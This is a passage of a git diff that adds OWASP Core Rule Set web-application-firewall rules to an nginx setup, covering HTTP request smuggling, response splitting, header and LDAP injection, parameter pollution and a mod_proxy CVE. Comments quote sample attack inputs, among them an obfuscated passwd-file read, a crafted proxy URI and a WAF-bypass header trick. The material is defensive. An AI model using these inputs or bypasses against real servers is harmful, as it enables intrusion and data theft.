setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# Missing Accept Header +# +# This rule has been moved to PL3 +# +# -=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# RFC 7231 does not enforce the use of the Accept header. +# It is just typical browser behavior to send and it can indicate a malicious client. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests, CONNECT requests, and requests coming from known +# offending User-Agents via two chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. +# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}'" + + +# +# PL3: The little known x-up-devcap-post-charset request header can be used to submit +# a request with a different encoding as an alternative to the charset parameter in +# the Content-Type header. This can be used to circumvent charset restrictions on +# the Content-Type header in ASP.NET. +# Note that this only works in combination with a User-Agent prefix. +# +# This rule is based on a blog post by Soroush Dalili at +# https://soroush.me/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/ +# +SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ + "id:920490,\ + phase:1,\ + block,\ + t:none,\ + msg:'Request header x-up-devcap-post-charset detected in combination with prefix \'UP\' to User-Agent',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'language-aspnet',\ + tag:'platform-windows',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# Cache-Control Request Header allow list +# +# -=[ Rule Logic ]=- +# This rule aims to strictly allow list the Cache-Control request header +# values and to blocks all violations. This should be useful to intercept +# "bad bot" and tools that impersonate a real browser but with wrong request +# header setup. +# +# The regular expression used on this rule tries to match multiple directives +# in a single value, for example: "max-stale=1, max-age=2". This leads us to +# use a regular expression that accepts a trailing comma to keep compatibility +# with all regex engines and not PCRE only. For example: "max-stale=1, max-age=2, " +# +# Moreover, this regular expression allows duplicate directives sequence like: +# "max-stale, max-stale=1, no-cache, no-cache". +# +# Standard Cache-Control directives that can be used by the client: +# - max-age= +# - max-stale[=] +# - min-fresh= +# - no-cache +# - no-store +# - no-transform +# - only-if-cached +# +# References: +# - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control +# - https://regex101.com/r/CZ0Hxu/22 +# +SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ + "id:920510,\ + phase:1,\ + block,\ + t:none,\ + msg:'Invalid Cache-Control request header',\ + logdata:'Invalid Cache-Control value in request found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'header-allowlist',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ + "setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +# +# This rule checks for valid Accept-Encoding headers +# +# This rule has a less strict sibling: 920520 +# +# Regular expression generated from regex-assembly/920521.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?gzip|identity|\*|^$|aes128gcm|exi|zstd|x-(?:compress|gzip)" \ + "id:920521,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept-Encoding header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + +# +# This is a stricter sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920202,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + + +# +# This is a stricter sibling of 920270. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90,95,97-122" \ + "id:920273,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ + "id:920274,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# +# This is a stricter sibling of 920270. +# The headers of this rule are Structured Header booleans, for which only `?0`, +# and `?1` are inconspicuous. +# Structured Header boolean: https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-header-structure-19#section-3.3.6 +# Sec-Fetch-User: https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# Sec-CH-UA-Mobile: https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile +# +SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ + "id:920275,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request headers (outside of very strict set)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + +# -=[ Abnormal Character Escapes ]=- +# +# [ Rule Logic ] +# Consider the following payload: arg=cat+/e\tc/pa\ssw\d +# Here, \s and \d were only used to obfuscate the string passwd and a lot of +# parsers will silently ignore the non-necessary escapes. The case with \t is +# a bit different though, as \t is a natural escape for the TAB character, +# so we will avoid this (and \n, \r, etc.). +# +# This rule aims to detect non-necessary, abnormal escapes. You could say it is +# a nice way to forbid the backslash character where it is not needed. +# +# This is a new rule at paranoia level 4. We expect quite a few false positives +# for this rule and we will later evaluate if the rule makes any sense at all. +# The rule is redundant with 920273 and 920274 in PL4. But if the rule proofs +# to be useful and false positives remain at a reasonable level, then it might +# be shifted to PL3 in a future release, where it would be the only rule +# covering the backslash escape. +# +# We forbid backslashes followed by a list of basic ascii characters - unless +# the backslash is preceded by another backslash. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \ + "id:920460,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + msg:'Abnormal character escapes in request',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/4',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/153/267',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" diff --git a/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf new file mode 100644 index 00000000..5861bf5a --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf @@ -0,0 +1,561 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ HTTP Request Smuggling ]=- +# +# [ Rule Logic ] +# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character. +# This would point to an attempt to inject a 2nd request into the request, thus bypassing +# tests carried out on the primary request. +# +# [ References ] +# http://projects.webappsec.org/HTTP-Request-Smuggling +# +SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \ + "id:921110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Request Smuggling Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ HTTP Response Splitting ]=- +# +# [ Rule Logic ] +# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. +# These characters may cause problems if the data is returned in a response header and +# may be interpreted by an intermediary proxy server and treated as two separate +# responses. +# +# [ References ] +# http://projects.webappsec.org/HTTP-Response-Splitting +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \ + "id:921120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ + "id:921130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Response Splitting Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ HTTP Header Injection ]=- +# +# [ Rule Logic ] +# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters, +# on their own or in combination with header field names. +# These characters may cause problems if the data is returned in a response header +# and interpreted by the client. +# The rules are similar to rules defending against the HTTP Request Splitting and +# Request Smuggling rules. +# +# [ References ] +# https://en.wikipedia.org/wiki/HTTP_header_injection +# +SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ + "id:921140,\ + phase:1,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via headers',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/273',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# Detect newlines in argument names. +# Checking for GET arguments has been moved to paranoia level 2 (921151) +# in order to mitigate possible false positives. +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule ARGS_NAMES "@rx [\n\r]" \ + "id:921150,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \ + "id:921160,\ + phase:1,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,t:lowercase,\ + msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Splitting ]=- +# +# This rule detect \n or \r in the REQUEST FILENAME +# Reference: https://wiki.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016) +# Reference: https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf +# +SecRule REQUEST_FILENAME "@rx [\n\r]" \ + "id:921190,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'HTTP Splitting (CR/LF in request filename detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/34',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ LDAP Injection ]=- +# +# [ Rule Logic ] +# +# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada +# and regex writing by Denis Kolegov. +# +# [ References ] +# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf +# * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ + "id:921200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:htmlEntityDecode,\ + msg:'LDAP Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ldap',\ + tag:'platform-multi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/136',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used. +# +# Regular expression generated from regex-assembly/921421.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921421 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \ + "id:921421,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Rule against CVE-2021-40438: +# A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. +# This issue affects Apache HTTP Server 2.4.48 and earlier. +# GET /?unix:AAAAAAAAAAAAA|http://coreruleset.org/ +# +SecRule REQUEST_URI "@rx unix:[^|]*\|" \ + "id:921240,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'mod_proxy attack attempt detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + + +# Detect newlines in GET argument values. +# These may point to a HTTP header injection attack, but can also sometimes +# occur in benign query parameters. +# +# See also: rule 921140, 921150 +# +SecRule ARGS_GET "@rx [\n\r]" \ + "id:921151,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:htmlEntityDecode,\ + msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/33',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# +# [ References ] +# * See rule 921422 +# +# Regular expression generated from regex-assembly/921422.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921422 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\+/]))\b" \ + "id:921422,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# +# + +# Forbid Request Range Header +# +# It is possible abuse the HTTP Request Range Header to leak error pages +# and other information in very small snippets. +# The easiest way to fight this is to deny the use of this header. +# This is a viable option since the header is only used in rare circumstances +# anymore. +# If it is necessary to use it in a certain setup, then it is best to +# create a rule exclusion for a given URI and this rule ID as a workaround. +# +SecRule &REQUEST_HEADERS:Range "@gt 0" \ + "id:921230,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP Range Header detected',\ + logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# These rules look for multiple parameters with the same name. +# 921170 counts the occurrences of the individual parameters. +# 921180 checks if any counter is > 1. +# +# One HPP attack vector is to try evade signature filters by distributing the +# attack payload across multiple parameters with the same name. +# This works as many security devices only apply signatures to individual +# parameter payloads, however the back-end web application may (in the case +# of ASP.NET) consolidate all of the payloads into one thus making the +# attack payload active. +# +# [ References ] +# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html +# https://capec.mitre.org/data/definitions/460.html +# +SecRule ARGS_NAMES "@rx ." \ + "id:921170,\ + phase:2,\ + pass,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" + +SecRule TX:/paramcounter_.*/ "@gt 1" \ + "id:921180,\ + phase:2,\ + pass,\ + msg:'HTTP Parameter Pollution (%{TX.1})',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/15/460',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \ + "capture,\ + setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# -=[ HTTP Parameter Pollution ]=- +# +# [ Rule Logic ] +# Parameter pollution rule 921180 PL3 can by bypassed when a weak backend parameter +# parser is ignoring additional characters in a parameter array name after the +# closing of the array. +# Rule 921210 PL3 prevents this 